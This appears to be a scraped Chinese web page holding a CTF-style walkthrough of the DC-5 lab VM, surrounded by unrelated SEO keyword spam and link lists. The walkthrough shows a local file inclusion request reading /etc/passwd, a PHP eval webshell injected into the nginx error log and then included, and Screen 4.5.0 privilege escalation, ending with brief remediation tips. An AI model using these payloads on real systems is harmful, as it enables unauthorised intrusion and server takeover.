当前位置: 首页 > news >正文

网站运营管理教材网站搬家

网站运营管理教材,网站搬家,花都网站制作公司,合肥市有做网站的公司吗DC-5渗透测试复现 目的#xff1a; 获取最高权限以及5个flag 过程#xff1a; 信息打点-文件包含漏洞-弹shell- scren-4.0.5提权 环境#xff1a; 攻击机#xff1a;kali(192.168.85.136) 靶机#xff1a;DC_3(192.168.85.134) 复现#xff1a; 一.信息收集 nma…DC-5渗透测试复现 目的 获取最高权限以及5个flag 过程 信息打点-文件包含漏洞-弹shell- scren-4.0.5提权 环境 攻击机kali(192.168.85.136) 靶机DC_3(192.168.85.134) 复现 一.信息收集 nmap -sP 192.168.85.0/24 或者 arp-scan -l 扫描端口 awvs扫描 网站框架查看  二.寻找漏洞  footer.php每一刷一次那个时间就会变 thankyou.php目录下发现存在footer.php的信息 有可能存在文件包含 POC: http://192.168.85.134/thankyou.php?file/etc/passwd 三. 漏洞利用 利用错误日志的方法上传webshell进行连接 http://192.168.85.134/thankyou.php?wenda?php eval($_POST[wenda]);? 这里的传参wenda是没有的 就是要构造错误的代码这样网站的日志就能记录然后需要抓包发送 因为一些编码会被浏览器自动转为url ,所以还得自己修改回去上传成功后 我们需要得到路径也就是webshell存在日志里 但日志路径是什么 网站日志 /var/log/nginx/error.log  http://192.168.85.134/thankyou.php?file/var/log/nginx/error.log 那地址就是这个了 连接一键了 然后为了方便弹shell 发现scren-4.0.5提权 四.scren-4.0.5提权  这个方法有很多 网上一搜就有很多利用方法 唯一注意点就是GCC版本 版本过高后边利用有点问题 exp:可以参考 GNU Screen 4.5.0 - Local Privilege Escalation - Linux local Exploit (exploit-db.com) kali漏洞库也自带这个漏洞 得到flag 修复 1.关闭111危险端口 2.过滤../ ./ 配置php.ini文件 都关闭allow_url_fopen 和 allow_url_include 设置白名单 3.关闭某些危险提权函数
http://www.pierceye.com/news/190496/

相关文章:

  • 刘家窑网站建设公司如何在网络上推广产品
  • 全球建站东莞市的网站公司哪家好
  • 地方网站发展怎么做链接推广产品
  • 上海制造网站公司网站优化做网站优化
  • vs2012做网站wordpress 页眉
  • 北网站建设重庆建设工程查询网站
  • 给我做网站的人老是给我留点尾巴太原本地网站搭建公司
  • 静态页面网站站标代码写进到静态页面了 怎么不显示呢?自助建站网
  • 免费在线代理网站微信会员卡管理系统
  • 和动物做的网站吗做网站销售怎么样
  • 宝塔面板做织梦网站深圳龙华大浪做网站公司
  • 阿里云建网站费用上海网站建设觉策动力
  • 电子商务网站的建设与维护方法h5第三方收款平台
  • 网站建设所需人力设计广告网站
  • php网站发送邮件动态倒计时网站模板
  • 温州建设网站制作wordpress调用文章简介
  • 大庆市建设局网站刘东科技公司做网站
  • 山东助企网站建设宁波百度关键词推广
  • 宜昌市夷陵区建设局网站培训推广 seo
  • 怎样做安居客网站用幽默的语言来形容网站开发
  • 宜昌网站建设选择宜昌慧享互动手机怎么防止网站跳转
  • 本地的上海网站建设公司汽车租赁网站设计
  • 在哪下载免费的英文版网站模板建站 网站程序有哪些
  • 网页前端做购物网站的实训报告网络营销推广是做什么的
  • 广东专业网站建设效果wordpress搜索框插件
  • 茂名建站模板搭建岳阳优化营商环境
  • shopify网站建设郑州机械网站制作
  • 郑州正规公司网站建设服务国内专业建站平台
  • 做财经直播网站php网站做安卓客户端
  • 视频直播网站开发运营步骤十大免费erp软件